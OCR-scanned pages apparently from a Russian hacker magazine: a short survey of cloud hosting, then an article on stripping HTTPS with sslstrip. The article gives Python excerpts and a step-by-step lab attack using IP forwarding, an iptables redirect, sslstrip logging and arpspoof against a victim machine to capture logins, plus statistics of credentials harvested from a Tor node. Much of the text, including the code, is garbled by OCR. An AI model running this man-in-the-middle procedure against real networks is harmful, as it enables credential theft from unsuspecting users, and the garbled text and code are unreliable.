их в условиях облака. Непросто перейти от обычных баз 
данных, особенно если раньше только и делал, что писал 
на РНР и МуЗОБ! 



■ АМА20Ы И 60061-Е 

С развитием технологий появилась возможность укрыться 
за слоем виртуализации и промежуточных библиотек, так 
что программисту реальных приложений совсем не надо 
знать о том, какой же там сервер под этим крутится. 
Подумай, ведь все основные языки современности давно 
уже исполняются на собственных виртуальных машинах! 
Разработчики оторвались от железа и возвращаться к нему 
не очень-то и хотят. Если инфраструктура облака хорошо 
спроектирована, а язык выбран правильно, то достаточно 
просто сделать так, чтобы большинство программ (заметь: 
не все] смогли работать и масштабироваться практи- 
чески линейно. При этом разработчик и пользователь 
ничего не будет знать о том, как ты внутри запускаешь 
все на десятке виртуальных серверов, каждый из которых 
работает на паре реальных. Появление первого серьезного 
и доступного сіоиб-хостинга от Атагоп-а породило, по сути, 
целую индустрию, явив простым смертным самые про- 
двинутые технологии. Наиболее известной системой такого 
рода является Ѳоодіе АррЕпдіпе, который предоставляет 
некую «песочницу», ограниченную вполне конкретным 
АРІ и системными сервисами. «Песочница» ограничена 
несколькими языками — сейчас это Рубіо п и баѵа, однако 
ресурсные ограничения достаточно либеральны, чтобы ты 
еще долго о них не думал (заявлено, что сервис доступен 



КЛАССИКА! ЛУЧШИЙ И НАИБОЛЕЕ ИЗ- 
ВЕСТНЫЙ ОБЛАЧНЫЙХОСТИНГДЛЯ ВИР- 
ТУАЛЬНЫХ МАШИН, А ТАКЖЕ МНОЖЕСТВО 
ДОПОЛНИТЕЛЬНЫХ СЕРВИСОВ 



бесплатно для сайтов, имеющих до 5 миллионов хитов 
в месяц; более точные ограничения смотри в документа- 
ции]. Сервис работает как бета, поэтому только недавно 
стало возможным зарегистрироваться всем желающим. 
Цены на сервис для коммерческого использования или тех, 
кому мало лимитов, разумны и сравнимы с конкурентами 
(как обычно — оплата часов или некоторых абстрактных 
единиц ресурсов]. Как ни странно, такой же сервис выпу- 
стила другая «империя зла» — МісгозоН Аіиге. В основе 
лежит специальная версия ѴѴіпбоѵѵз Зегѵег 2008; осталь- 
ные сервисы, доступные разработчику, базируются на уже 
зарекомендовавших себя технологиях — .ІЧЕТ Випбте, ЗОБ 
Зегѵісе, Біѵе, ЭЬагеРоіпі, Бупаппісз СРМ. Приложения имеют 
доступ ко всем сервисам посредством абстрагированного 
от деталей АРІ, через НТТР, РЕ5Т, 50АР. Судя по включению 
в сіоиб типичных бизнес-платформ, система будет в основ- 
ном ориентирована на построение корпоративных прило- 
жений и сервисов. Пока идет тестирование, можно получить 
совершенно бесплатный доступ ко всем материалам. 
Атаіоп — один из самых больших и масштабных игроков 
на рынке облачных систем. Его сервисами пользуются 
множество компаний, почти все — стартапы, например, 
нашумевший Тѵѵійег решил проблему масштабирования 
именно при помощи Атагоп ЕС2. Расшифровывается, 
как Еіазбс Сотрите СІоисІ, и сегодня это самый доступный 
и надежный вариант на рынке. Однако учти, что придется 
платить за все ресурсы (передаваемые данные, процессор- 
ное время, хранение данных], а возможности расширения 
каждого конкретного сервера все же ограничены. Также 
в реальной работе надо учитывать массу нюансов, напри- 
мер, что при выключении виртуальная машина (инстанс] 
не сохраняет данные и теряет свой ІР-адрес. 

Все облачные услуги от Атагоп предоставляются 

под общим брендом ѴѴеЬ Зегѵісез и включают, кроме ЕС2: 

• ЗітрІеБВ — сервис базы данных с простым интерфейсом 
и ЗОБ-подобными ВОЗМОЖНОСТЯМИ; 

• Зітріе Зіогаде Зегѵісе или 53 для хранения больших 
объемов данных и РЕ5Т-АРІ для доступа; 

• СІоибБгопІ: — распределенная сеть хранения и доставки 
контента; 

• Зітріе Оиеие Зегѵісе — система очередей сообщений 
для создания распределенных приложений; 

• Еіазбс МарРебисе — система обработки и анализа боль- 
ших объемов данных на базе открытой Арасбе Набоор. 



н ЧТО МНЕ СТОИТ 
ОБЛАКО ПОСТРОИТЬ? 

Не думай, что облачные штучки доступны только тем, у кого 
много денег. Хотя ты недалек от истины, так как почти все 
компании не предлагают ничего на халяву и, попользо- 
вавшись сервисом хотя бы час, тебе уже придется платить. 
Есть приятные исключения, вроде Аріапа Сіоиб, где можно 
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без финансовых вложений в течение 30 дней 
пользоваться самой маленькой виртуальной 
машинкой. Но если тебе уже не терпится что- 
то попробовать разобрать своими руками, 
я расскажу о парочке проектов, которые позво- 
лят бесплатно, то есть даром, создать в домаш- 
них условиях аналоги Ооодіе АррЕпдіпе 
и Атагоп ЕС2. 

Как ты помнишь, АррЕпдіпе — это такая среда 
для исполнения программ (на РуЕНіоп-е), где 
твой скрипт работает внутри облака в специ- 
альной песочнице и взаимодействуете миром 
через АРІ. Ресурсы для него выделяются 
динамически и очень гибко. Это идеально под- 
ходит как для различных исследовательских 
проектов, так и для быстрого построения веб- 
приложений, тогда точно можно не бояться 
перегрузок и бідд-эффекта. Открытая реали- 
зация называется АррЭсаІе и на ней можно 
запускать те же самые программы, что и в ори- 
гинальной боодіе-поделке. 

Если у тебя есть мощный компьютер, ты 
можешь развернуть такую систему на несколь- 
ких виртуальных машинах, имитируя кластер, 
или же просто одолжить у друзей несколько 
системников и собрать кластер в отдельно 
взятой комнате. АррЭсаІе поставляется в виде 
уже настроенного образа Ыпих-системы, кото- 
рый ставится или на виртуальную машину Хеп, 
или на буржуйском Атагоп ЕС2, а для самых 
умных — работает на основе открытого аналога, 
ЕисаІурШз, о котором ниже. 

Учитывай, что надо, как минимум, 4 сервера, 
а значит, компьютер должен быть мощным, 
очень желательно — 64-битным. И — побольше 
памяти, ведь 4 Хеп-а будут кушать ресурсы 
с непомерным аппетитом! Детальная инструк- 
ция по установке и запуску достаточно объ- 
емная, поэтому читай ее на официальном 
сайте: ЫірУ/сосІе.доодІе.сопп/р/арргсаІе/ѵѵікі/ 
Реріоѵіпд АррЭсаІе ѵіа Хеп . Если все полу- 
чится, у тебя будет свое собственное облако, 



где можно экспериментировать с различными 
программами на питоне. Потом, если очень 
хочешь, их можно перенести и на Ооодіе. 

Они должны работать совершенно одинако- 
во, несмотря на то, что АррЭсаІе опирается 
на открытые аналоги гугловских технологий 
(и не факт, что внутри все работает точно 
также]. 

Если РуіЬоп тебя не устраивает, и ты хочешь 
попробовать что-то еще, можно попытаться 
построить облачный хостинг виртуальных 
машин, такой же, какуАтагоп ЕС2, в кото- 
ром ты и друзья могут инсталлировать свои 
собственные операционные системы и тво- 
рить там что угодно. Для этого используется 
другая открытая разработка — ЕІЭСАЕУРТІЭЭ, 
что совсем не дерево, а Еіазбс ІЛіІіІу Сотрибпд 
АгсЬТесШге Ьг Ыпкіпд Уоиг Ргодгатз То ІІзеіТіІ 
Эузіетз. Если кратко,— это промежуточная 
среда, которая работает на множестве компью- 
теров (кластере) и предоставляет через веб 
и консоль возможность загрузить собственный 
образ виртуальной машины и управлять им, 
получая тот самый Атагоп, только бесплат- 
но. Говорят, что даже утилиты и АРІ стырены 
аналогично амазоновским, поэтому потре- 
нироваться сначала можно на них, а потом 
уже перейти на амазон, если страшно наобум 
выбрасывать столько денег. Кстати, тот самый 
АррЭсаІе отлично работает поверх ЕисаІурШз-а, 
избавляя тебя от необходимости химичить 
с Хеп и образами. Просто взял и запустил! 

Если надо управлять множеством виртуальных 
машин, формируя из них одно или несколько 
облак, попробуй еще одну открытую разра- 
ботку — Епотаіузт ( ѵѵѵѵѵѵ.епотаіѵ.сопп ). Это 
платформа, позволяющая объединить как ком- 
мерческие виртуальные машины (ѴМѵѵаге, 

КѴМ, Хеп и другие], так и облачные системы 
типа Атагоп ЕС2 в один большой виртуальный 
дата-центр, управляемый одной веб-консолью. 
Доступ к платформе из твоих приложений 



очень прост и основан на стандартных протоко- 
лах ХМРР, РЕ5Т, ТЭОЫ. 

в С НЕБЕС НА ЗЕМЛЮ 

Самое главное, что нужно понять: облачные 
системы — это средство для получения некото- 
рой среды, в которой могут работать как обыч- 
ные виртуальные машины с пользователь- 
скими ОС, так и целые платформы для испол- 
нения приложений. Важным преимуществом 
СІоисІ-а является независимость от аппарат- 
ного обеспечения и гибкая масштабирован- 
ность, хотя в этом направлении еще много чего 
можно сделать. Обычно в облаках размещают- 
ся молодые проееты, которые еще фиг знает, 
выстрелят или нет. Поэтому лучше оплачивать 
все ресурсы (СРІ), за каждый гигабайт тра- 
фика, за место в хранилище) по часам. В этом 
отличие от обычного хостинга, где деньги надо 
отдать сразу за месяц. Вторым преимуществом 
будет ЭЭА — уровень предоставления серви- 
са обычно намного выше, чем у стандартных 
хостингов, а облако предлагает уровень надеж- 
ности в 99,999. Так что, отказ любой из систем 
или даже всего сервера/стойки никак не уро- 
нит твой сайт! Если не хочется заморачиваться 
с установкой операционной системы, виртуа- 
лизацией и прочими сисадминскими деталями, 
выбирай облачные системы, предоставляющие 
сразу платформу на твоем любимом языке 
(выбор обычно — или ^ѵа или РуіЬоп). Ты 
будешь ограничен заранее заданным АРІ, часто 
будет не хватать обычных сервисов и при- 
ложений, в первую очередь ЭСП-базы данных, 
но когда привыкнешь, сможешь делать при- 
ложения, которые выдержат миллионы хитов, 
а сломать хрен кто сумеет! Облачные систе- 
мы, как правило, гораздо лучше защищены, 
да и до конечной ОС тяжело добраться, ведь 
там может быть несколько уровней виртуали- 
зации, мониторинга и систем безопасности 
(попробовать, впрочем, можно...), т 
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ПРИНЦИПДЕЙСТВИЯ 

55І.5ТКІР 



АНТОН ЖУКОВ 

/ АЫТІТЗТЕРОбМАП.СОМ / 

ВСКРЫВАЕМ 551. 

Перехват данных в защищенных соединениях 

Используя мейл, админку или систему электронного банкинга 
для управления своим счетом, мы полностью доверяемся серверу. 
Если все данные передаются по защищенному 55І_-соеди нению — 
о чем радужно сообщаетбраузер — то и бояться вроде бы нечего. 
Но так л и это на самом деле? 



Простая истина: передавать данные в откры- 
том виде — небезопасно. В этом случае они 
легко могут стать добычей злоумышленника, 
которому не составит труда перехватить, 
модифицировать и даже подменить их. Вот 
почему логины и пароли, а также другие 
конфиденциальные данные по обычному 
НТТР не передаются. Вместо этого использу- 
ется защищенный НТТР5, который работает 
медленнее, но зато упаковывает данные 
в криптографический протокол 55І_ — и те 
передаются уже в зашифрованном виде. 

и КАК УСТРОЕН 551.? 

Алгоритм работы 55І_ построен на исполь- 
зовании пары асимметричных ключей. 
Открытый ключ раздается всем желающим, 
и с его помощью шифруются необходимые 
данные, которые далее можно дешифровать 
только с помощью закрытого ключа (он есть 
на сервере]. Открытый ключ предоставля- 
ется сервером клиенту, причем выдается 
в составе сертификата (подписывается тре- 
тьей уполномоченной стороной — так назы- 
ваемым центром сертификации: сегбГісаіе 
а и1:ЬогМ:у — СА]. 



В любой сертификат входят следующие поля: 

• полное (уникальное) имя вла- 
дельца сертификата; 

• открытый ключ владельца; 

• дата выдачи цифрового сертифи- 
ката ; 

• дата окончания действия серти- 
фиката; 

• полное (уникальное) имя издате- 
ля (источника сертификата) ; 

• цифровая подпись издателя. 

Существует несколько видов сертификатов. 
Чтобы удостовериться в подлинности кон- 
кретного сайта, используется специально 
выписанный для него сертификат (5іІе 
Сегббсаіе]. Для проверки подлинности таких 
сертификатов в свою очередь существуют 
сертификаты центра сертификации (СА 
Сегббсаіе); они обладают максимальным 
доверием и встраиваются непосредственно 
в браузер (их также называют корневы- 
ми — Рооі: СА]. Помимо этого, существуют 
промежуточные сертификаты (Іпіегтебіаіе 
СА], которые также используются для под- 



писи 5іІе СеіііГісаІе, однако, в отличие 
от СА Сегббсаіе, не гарантируют легитим- 
ность сайта и не встраиваются в браузер. 
Получается, что в самом простом случае 
вся цепочка состоит из следующих звеньев: 
«СА СегііЕсаіе — Іпіегтебіаіе СА — 5М:е 
Сегббсаіе», однако промежуточных серти- 
фикатов может быть больше. Так или иначе, 
проверка подлинности сайта осуществляется 
с помощью простой рекурсивной процедуры: 

• сначала проверяется, чтобы крайний 

в цепочке сертификат был выписан на имя 
сайта, к которому идет обращение; 

• проверяется, не просрочен ли сертификат; 

• в конце проверяется подпись, с помощью 
которой он подписан. 

Подпись может принадлежать или корневому 
сертификату, и это значит, что сертификату 
можно 100% доверять, или же некоторому 
промежуточному сертификату. В последнем 
случае необходимо подняться на уровень 
выше и выполнить проверку еще раз — 
и так, пока не будет найдена подпись кор- 
невого сертификата. Или не будет, что озна- 
чает: удостовериться в подлинности сайта 
невозможно. 



► 026 
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СХЕМА РАБОТЫ 
55І.5ЖРР 



в 55І.5ШРР ИЛИ 
КАК ВСЕ НАЧИНАЛОСЬ 

Представим такую картину: у нас есть 
сертификат для нашего сайта хакер.ги : 
он является последним звеном в цепочке 
«Рооі: СА — I піегт есі іа1;е СА — Іпіегтесііаію 
СА — хакер.ги». Почему бы не попро- 
бовать сделать сертификат сайта проме- 
жуточным и не подписать с его помощью 
другой ресурс, например, раѵраі.сот ? 

Все условия проверки для цепочки (Рооі: 

СА — Іпіегтесііаіе СА — Іпіегтесііаіе СА — 
хакер.ги — раураі.сот] при этом останутся 
выполненными: 

• подписи всех сертификатов действи- 
тельны; 

• ни один сертификат не просрочен; 

• корневой сертификат встроен в браузер 
и обладает полным доверием. 

Тут одна лишь загвоздка: как же мы выда- 
дим сертификат? 

У каждого сертификата есть неприметное 
поле Вазіс Сопзігаіпіз, которое определяет, 
принадлежит ли он центру сертификации 
или нет. Что удивительно, далеко не все 
центры ранее выставляли ему значе- 
ние СА=РАІ_5Е. Более того, большинство 
браузеров даже не утруждались проверкой 
значения этого поля. Получается, имея 
на руках действительный сертификат, 
можно было создать и подписать сертифи- 
кат для любого другого домена — и браузе- 
ры даже не заподозрили бы неладное! 
Несмотря на многочисленные заявления, 
что эксплуатировать это невозможно, раз- 
работчик Мохіе Магііпзріке опубликовал 
рабочую утилиту ззізпііф которая реали- 
зовывала простую атаку МІТМ (Мап іп 1Ье 
тісісііе), перехватывая весь трафик. Смысл 
сводился к следующему: 

• прога перехватывала клиентские запро- 
сы на соединение с защищенным НТТР5- 
сайтом; 

• сама создавала сертификат для сайта, 
к которому коннектится клиент, и подпи- 
сывала его с помощью уже имеющегося 
сертификата; 



• со своей стороны устанавливала обыч- 
ное НТТРЗ-соединение с нужным сервером 
и выступала своеобразной проксей, снифая 
весь трафик. 

Все, что требовалась для работы — это 
предоставить ззІзпіІЧ действительный 
сертификат. К сожалению, с 2002-го, когда 
была опубликована утилита, браузеры 
стали умнее и такой проверкой больше 
не пренебрегают. Увы, такой способ нам 
уже не поможет! 

в ПРОДОЛЖЕНИЕ 
ИСТОРИИ — 55І.5ТКІР 

Чтобы разобраться с другим спосо- 
бом, вспомни, как мы обычно попадаем 
на защищенные страницы. Допустим, ты 
захотел проверить свой почтовый ящик 
Отаіі. Просто набираешь в адресной стро- 
ке таіі.аоодіе.сопп и попадаешь на защи- 
щенную страницу авторизации. Никто 
не набирает ЫЧр://, а уж тем более Шрз://. 
Получается, что пользователь попадает 
на защищенную страницу двумя путями: 
кликая на ссылки/кнопки или через реди- 
ректы. Переход на защищенные ресурсы 
осуществляется посредством обычного 
ЫЧр-протокола, а его, как я уже говорил, 
легко перехватить. 

Липовый сертификат «на лету» создать 
уже не выйдет. Так, может, обойдемся 
вовсе без сертификата? Зачем его созда- 
вать, если есть шанс перехватить запрос 
на защищенное соединение с сервером 
и заставить пользователя общаться с нами 
по самому обычному НТТР? Именно эта 
идея и легла в основу программы ззізігі р , 
которую на недавней конференции Віаск 
На! БС 2009 представил все тот же хакер 
Мохіе Магііпзріке. 

Предлагаю рассмотреть ее более под- 
робно. Помимо описания, я буду при- 
водить небольшие отрывки исходников 
на РуЛэоп’е. В основе, опять же, лежит 
принцип МІТМ, позволяющий вклиниться 
между сервером и клиентом, просматривая 
проходящий НТТР-трафик. В каждой пере- 



хваченной ссылке на защищенной ресурс 
выполняется замена «ЫТрз://» на «ЫТр://», 
а исходная и измененная ІІРІ_ заносятся 
в таблицу соответствия. 

йек герІасеЗесигеЪіпкз (зеік, сіака) : 

сіака = БакаЗЬиккіег . герІасеЗесигеЪіпкз 
(зеік, сіака) 

сіака = зеік . герІасеЗесигеСоокіез (сіака) 
сіака = зеік . герІасеСззЪіпкз (сіака) 
сіака = зеік . герІасеЗесигеЕаѵісоп (сіака) 

ікегаког = ге . кіпсіікег ( 
зеік . ІіпкЕхргеззіоп, 
сіака, 

ге.ІСЫОКЕСАЗЕ) 

ког шаксЬ іп ікегаког: 

Ііпк = шакск . дгоир ( 9 ) 

ік пок Ііпк. зкагкзмікЪ. ( 'Ьккр 1 ) : 
Іоддіпд . ЦеЪид ( " Еоипсі геіакіѵе 
Ііпк іп зесиге кгапзшіззіоп: " + Ііпк) 

аЬзоІикеЪіпк = "Ьккр://" + 
зеік . зегѵегНозк + Ііпк 
аЬзоІикеЪіпк = аЬзоіикеЬіпк.герІасе 
( 1 &ашр ; ' , ' & ' ) 

зеік . зесигеЬіпкЪізкепег . 
асМЪіпк (аЬзоІикеЪіпк) ; 

гекигп сіака 

Как только клиент посылает запрос 
на соединение с защищенным ІІПІ_, мы 
подсовываем ему липовую ссылку, а сами, 
тем временем, устанавливаем настоящее 
НТТРЗ-соединение, выполняя запрос 
от своего имени. Получив ответ от сервера 
и опять выполнив замены в линках, отдаем 
контент пользователю по обычному НТТР- 
соединению. 

В результате получается замечатель- 
ная картинка. Серверу, отдающему весь 
контент по защищенному каналу, нет 
никакого дела, от кого приходит под- 
ключение, а клиент не получает никаких 
предупреждений и даже не подозревает, 
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• Если верить раз- 
работчику 55 Ізпй! 
Мохіе Магііпзріке, — 
некоторые браузе- 
ры по-прежнему 

не утруждают себя 
проверкой поля 
Вазіс Сопзігаіпіз. 

• Вся информация 
представлена ис- 
ключительно в озна- 
комительных целях. 
В случае использо- 
вания ее в противо- 
законных целях 

ни автор, ни редак- 
ция ответственности 
не несут. 




НТТР://ѴѴѴШ 

"■ Г 

Ь Ііпкз 

• Домашняя странич- 
ка Мохіе Магііпзріке: 

іЬоидЫюгіітіе.огд . 

• ЗЗІЗПІ^: 
іЬоидЫсгіте. 
огд/зоііѵѵаге/ззІзпіІТ . 

• 55І5ІІГІ р : 

ібоидЫюгіте.огд/ 

зо^ѵѵаге/ззізігір . 

• агрзрооЕ 

агрзрообзоигсеЬгде.пеЕ 




>ЙУЙ 



• Все упомянутые 

в статье утилиты ты 
найдешь на нашем 
ОѴО-приложении. 

• На диске ищи не- 
большую демонстра- 
цию возможностей 
ззізігір. 



что использует незащищенное соединение. А мы? 

А мы перехватываем весь трафик :). 

3 НЕСКОЛЬКО УЛОВОК 

Чтобы еще больше создать иллюзию, что все безопас- 
но, будем отслеживать запросы Іаѵісоп (это иконка, 
отображающаяся в адресной строке браузера непо- 
средственно перед адресом). И когда получаем такой 
запрос для защищенного соединения, то подсовываем 
иконку с замочком, которая в обычно й ситуации ука- 
зывает на то, что соединение осуществляется по безо- 
пасному каналу. 

сіеі герІасеЗесигеЕаѵісоп (зеіі , сіаіа) : 
ііегаіог = ге. ііпйііег ( 
зеіі: . ісопЕхргеззіоп, 
сіаіа , ге . ІСШКЕСАЗЕ ) 

іог таісЬ. іп ііегаіог: 

Ііпк = таісЬ.дгоир (1) 

Ііпк . геріасе ( ' Ьіір : / / 1 , ' Ьіірз : / / ' ) 

іі поі Ііпк. зіагізмііЬ ( ' іііір: // 1 ) : 

Ііпк = 'іііір://' + зеіі . зегѵегНозі + Ііпк 

зеіі. зесигеЬіпкЬізіепег . \ 
асІсІЗесигеЕаѵісоп (Ііпк) 
зеіі . зесигеЬіпкЬізіепег . асісіьіпк (Ііпк) 

геіигп сіаіа 

Проблемы с подменой ссылок могут возникнуть в сле- 
дующих случаях: 

• с компрессированным контентом, который сложно 
парсить; 




СОЗДАНИЕ ПРАВИЛА В ІРТАВІ.Е5 

ДЛЯ ПЕРЕНАПРАВЛЕНИЯ НТТР-ТРАФФИКА 

НАП0РТ8080 



• с безопасными кукисами, которые не передают 
по незащищенному соединению; 

• с банально закешированными страницами, в которых 
мы не можем сделать замену. 

Как быть? 

В кукисах нам потребуется убирать флаг зесигКу ЬК 
в поле в 5еі-Соокіе, чтобы плюшки стали передавать- 
ся по обычному НТТР. От сжатия контента придется 
отказаться, удалив в хедерах НТМЕ параметр сопіепі 
епсобіпдз (отключаем сжатие), а также іктобібеб- 
зіпсе (принудительно заставляем сервер отдавать 
страницу, даже если на ней не было изменений). 
Другая проблема — сессии. Пропуская этап авторизации, 
мы можем остаться без логина и пароля. Решение следую- 
щее: сессию тоже надо убивать, но нужна осторожность, 
чтобы не вызвать подозрений. Сессии имеют свойство 
истекать (заканчиваться), причем не всегда ясно, когда 
это произойдет. Одно можно сказать почти наверняка: они 



ПОЛЕ СЕРТИФИКАТА «ВА5І С С0Ы5ТРАІМТ5» СО ЗНАЧЕНИЕМ ПАРАМЕТРА «СА=РАІ_5Е» 



[ііе ^-сій УЕГгтпгкаІ Тв\^ъ Цеір 



I ггі*м*фі*иг<:Ьігед: I -ДЭе^Ійор/Ь... 



Н^гтепі: 



ТЙ : с9 :Ѳ * :24 :с? :с2 : 92 : Ѳс : 13:54 :93 :сЕ : 9Ь :с ? : 

09 : 1=а : 19 :аЗ :Й5 :,гіЭ : Т7:^ІЬ:Б^ 

Е х роггет : 655 37 [ Ѳк 1 ѲОѲ 1 ) 

Х5Ѳ9ѵЗ Ке-у Іійадё: егіііеаі 

ОідііаІ 5ідпаі:иг^, Моп Я^ригііаПіоп, Кеу ЕлсірМѳгтепі: , О аіа Епсір 



кау ІйалтіТіег: 

Х5Ѳ9ѵЗ СИ_ ОіБі; гійиніоп Роілпз: 

ШІ : МП Гр : //с гі . дѳоП .с от/ с гІ5/дІоЬа1са1 _ с гі 



Х509ѵЗ йиПМогНу Кеу [сІепНІ^іег: 

кеуій:ВЕ:АВ;Д0:74:72:50:6В:44:В7:С9:23:ОВіРВ:АВ:РР:ВЗ:57:бВ:бВ:6 



Х5№ъй кеу изэда: 

ТЕ$ ѴѴмМ 5вгуа Г ДиіМопіісэ'ііоп, ТЕ 5 Сіірги АиіИепт ісаПІоп 

ѵЗ Оазлс СсшзПгаіпгз: с гііісаі 

СА:РЫ_5Е 

$ I. уг>н т и ге А1 до г з. і Мт : х Ма 1 ’л 1 1 1 1 іИБА В К гурт I мг'і 

7а:5В:1 г Э:вВ:14:сЬ:77:Э2:аа:ВЗ:12:сГа:^9:15:74:Вв:34:вЗ: 

66:сэ:Ьс :24 :2с : 28:96:54 :ссІ :Ьа :51 : 56:63:8? :-:-3 ;Ьо :с6:2е: 

В6 : 7е : 74 : с 1 : 60 : Ѳ 1 : Ь6 :8 с :сб : а 2 і Ѳс : а4 : 36 :са : 9 1 : аВ : 99 : 
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ПОДПИСЫВАЕМ СЕРТИФИКАТ 
РАѴРАІ..СОМ ИМЕЮЩИМСЯ 
НА РУКАХ СЕРТИФИКАТОМ 
ДЛЯХАКЕР.КУ 



Іпіегтесііаіе 
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крайним звеном в цепочке 

ЯВЛЯЕТСЯ СЕРТИФИКАТ САЙТА 
ХАКЕР.РІ) 
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-V 


І_еаІ 

(хакер. ги) 




Ь 







іг-і 

Іпіегтесііаіе I 

и Г^| — 



Цепочка сертификатов: от сертификата центра 
сертификации до сертификата нашего сайта 



не истекают посреди активной работы. Поэтому 
сразу после начала МІТМ-атаки начинаем 
модифицировать трафик, проходящий через 
нас, но не трогаем Соокіез в течение какого- 
то промежутка времени (например, бминут]. 
Ждем эти бминут, и запоминаем все сессии, 
которые видели за это время. Если после 
бминут появляется какая-то новая, то получа- 



ется, она уже долго работает и, если мы ее при- 
бьем, то подозрений это, скорее всего, не вызо- 
вет. Вот, в общем-то, и все секреты успеха. 

г ИСПЫТАЕМ 
55І.5ТШР В ДЕЛЕ 

Но довольно лирики. Посмотрим, реаль- 
но ли утащить чьи-нибудь логины 



Доверенный центр 
сертификации 



Неизвестный центр 
сертификации 



Неизвестный центр 
сертификации 



РооіСА 

сертификат 



Проверяем срок действия сертификата. 
Он подписан Рооі СА. Рооі СА является 
доверенным, на этом проверка заканчи- 
вается. Подлинность сайта установлена. 

Проверка срока действия сертификата. 
Узнаем, что СА2 подписан сертифика- 
том СА1, который опятьже неявляется 
доверенным. Проверяем следующий 
сертификат. 

Проверяем срок действия сертификата 
и узнаем, что он подписан сертификатом 
СА2.Т.К. тот не является доверенным, 
переходим к следующему сертификату в 
цепочке. 



«ПРОЦЕДУРА ПРОВЕРКИ 
СЕРТИФИКАТОВ» 



Программа, 

проверяющая 

сертификат 




2-й 

сертификат 

СА 



і-й 

сертификат 

СА 



и пароли. Опыты мы будем проводить 
на виртуальных машинах. Итак, у нас есть 
небольшая локальная сеть, состоящая 
из машины жертвы (192.168.1.3), нашей 
машины (192.168.1.5) и машины, служа- 
щей шлюзом в интернет (192.168.1.1). 
Теперь подготовим плацдарм для атаки. 

В качестве ОС на своей машине будем 
использовать популярный дистрибутив 
ВаскТгаскЗ (все то же самое можно проде- 
лать и под Виндой, поставив необходимые 
программы и настроив систему, но зачем 
делать лишнюю работу, если кто-то уже 
сделал ее за тебя?). Итак, загружаем систе- 
му и устанавливаем ззізігір: 

#ЬС руСТюп зеСир.ру іпзСаІІ 

В принципе, можно даже не устанавливать, 
а запускать ззізігір сразу: 

#ЬС руСТюп . /ззІзСгір .ру -Ъ — 
покажет список параметров . 

Чтобы все заработало, нам нужно 
немножко подконфигурировать систему. 
Сперва включим на машине режим пере- 
направления пакетов Цогѵѵагсііпд тобе). 
Делается это следующей командой: 

#ЬС есЪо "1" > /ргос/зуз/пеС/ 
ірѵ4 / ір_^огѵ^агсі 

Затем настроим іріаЫез для перенаправле- 
ния Ы;1:р -трафика: 
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ПРИМЕРЛ0ГА55І.5ТРІРС ПЕРЕХВАЧЕННЫМИ ПАРОЛЯМИ 



«ВСЕ, ЧТО ТРЕБОВАЛАСЬ 
ДЛЯ РАБОТЫ — ЭТО 
ПРЕДОСТАВИТЬ 55І.5МІРР ДЕЙ- 
СТВИТЕЛЬНЫЙ СЕРТИФИКАТ. 

К СОЖАЛЕЙ ИЮ, С 2002-ГО, 
КОГДА БЫЛА ОПУБЛИКОВАНА 
УТИЛИТА, БРАУЗЕРЫ СТАЛИ 
УМНЕЕ И ТАКОЙ ПРОВЕРКОЙ 
БОЛЬШЕ НЕ ПРЕНЕБРЕГАЮТ» 

#Ък іркаЫез -к пар -А РКЕКОИТІШ -р Сер 
--(іезРіпаРіоп-рогР 80 -3 КЕБІКЕСТ --Ро-рогР 
<уоигЬізРепРогР> 

где <уоигІ_І5ІепРогІ> — порт, которых будет слушать ззізігір; устано- 
вим его в 8080, например. 

Теперь можно запустить и сам ззізіхір: 



#ЬР ззІзРгір -а -1 8080 -ѵг /гооР/1од . РхР 

Параметр 1 -а 1 означает, что мы будем логировать весь проходящий 
ЫТр-трафик, 1 - 1 1 указывает порт, который будем слушать, а ’-ѵѵ 1 
задает путь к лог-файлу. Остался последний штрих — заставить жерт- 
ву поверить, что мы и есть тот самый шлюз в интернет. Провернем 
это с помощью утилитки агрзрооП 

агрзрооР -і <уоигЕекѵ\гогксШеѵісе> -к <уоигТагдеР> 
<РІтеРоиРегзІрАс1сігезз> 

<уоиг№кѵгагксШеѵісе>! — имя нашей сетевой карты 
(в нашем случае еРЬО) , 

<уошгТагдеР> — адрес жертвы, 

<РйеКоиРегзІрАс1с1гезз> — адрес шлюза 

#ЪР агрзрооР -і еРЬО -Р 192.168.1.3 192.168.1.1 

Дождись, пока жертва полезет в инет, и проверяй логи, пример 
которых можешь увидеть на одном из скринов. Все замечательно 
работает! 

в НУЛЕВАЯ БЕЗОПАСНОСТЬ 

Как видишь, безопасность 55І_ можно свести до нуля и превратить 
защищенное соединение в незащищенное, добавив на участке 
до пользователя коннект по обычному Шр- прото колу. 

Узнав, насколько это просто реализовать, думаю, ты с особой вни- 
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ИНСТАЛЛЯЦИЯ 55І.5ТКІР 



ЗАПУЩЕННЫЙ 55І.5ТВІР И АКР5Р00Р ЗА РАБОТОЙ 




■■ ‘■іи і I I і Г ■■^ЧЛ^т^І-м- “ 



-Іі 



Ікркц бм^і і ннктрожж ПОЧТѢ 




55І.5ТКІР В ДЕЙСТВИИ. 

АТАКУЮЩИЙ ПЕРЕХВАТИЛ ЗАПРОС НА БЕЗОПАС- 
НОЕ СОЕДИНЕНИЕ И ПОДМЕНИЛ ЕГО, ЧТО ХОРОШО 
ВИДНО ПО АДРЕСНОЙ СТРОКЕ — ВМЕСТО НТТР5 
ТАМ СТОИТ НТТР 

мательностью будешь относиться к сообщениям браузера об исполь- 
зовании защищенного соединения и посматривать на адресную 
строку. Ни в коем случае не воспринимай статью, как побуждение 
к действию! Она лишь призвана показать основные ошибки ЗОИ 
и НТТР. щ 



НЕМНОГО 

СТАТИСТИКИ 

Мохіе Магііпзріке запустил ззізггір на Гог узле и за 24 часа 
словил нехилый урожай учетных записей: 

• Іо^іп.уаііоо.сот — 114 

• Стаіп — 50 

• йскегтазгег.сот — 42 

• гарібзЬаге.сот — 14 

• Ногтаіі — 13 

• раураксот — 9 

• Нпкесііп.сот-9 

• 1асеЪоок.сот — 3 



ХИТРОСТИ 

ІІІРІ_ 




к.' Р'-ч-* і *-+ МЧ 'І Щ ■ ■ ■ И -м 




ПОДДЕЛ ЬНЫЙ АДРЕС ОМАН, СОЗДАННЫЙ С ПО- 
МОЩЬЮ ОМОГРАФИЧЕСКОЙ АТАКИ (НАСАМОМ 
ДЕЛЕ ЭТОТСАЙТЯВЛЯЕТСЯ ПРОСТЫМ ПОДДО- 
МЕНОМ *.ШК.СКІ) 

Технику 55І5Ггір вполне реально совместить с так называемыми 
омографическими атаками. Это атаки, при которых создается 
схожее имя домена с использованием букв алфавита другого 
языка — с целью ввести пользователей в заблуждение и создать 
впечатление, что они переходят на разрешенный веб-сайт. 

В 2005-м Егіс бойапзоп зарегистрировал доменное имя 
